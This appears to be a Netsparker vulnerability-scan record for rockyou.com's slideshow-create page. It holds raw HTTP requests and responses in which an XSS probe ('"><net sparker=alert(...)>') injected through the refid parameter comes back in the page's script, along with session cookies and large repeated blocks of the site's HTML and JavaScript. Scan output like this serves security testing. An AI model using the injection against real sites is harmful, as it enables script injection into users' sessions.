<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?refid=&nsextt='%22%3E%3Cnet%20sparker=netsparker(0x000BBB)%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Create..
Date: Mon, 18 Apr 2011 22:04:10 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:04:09 GMT; path=/; domain=.rockyou.com,lastlogin=1303164250; expires=Wed, 27-Jul-2011 22:04:10 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:04:10 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=28675 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26906
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?refid=&nsextt='%22%3E%3Cnet%20sparker=netsparker(0x000BBB)%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Create..
|
- /slideshow-create.php
/slideshow-create.php |
Parameters
| Parameter | Type | Value |
| source | GET | cyo |
| refid | GET | '"><net sparker=alert(0x0010C7)> |
Request
GET /slideshow-create.php?source=cyo&refid='%22%3E%3Cnet%20sparker=netsparker(0x0010C7)%3E HTTP/1.1
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164767; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164767; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:12:47 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:12:46 GMT; path=/; domain=.rockyou.com,lastlogin=1303164767; expires=Wed, 27-Jul-2011 22:12:47 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:12:47 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=27842 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26918
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new 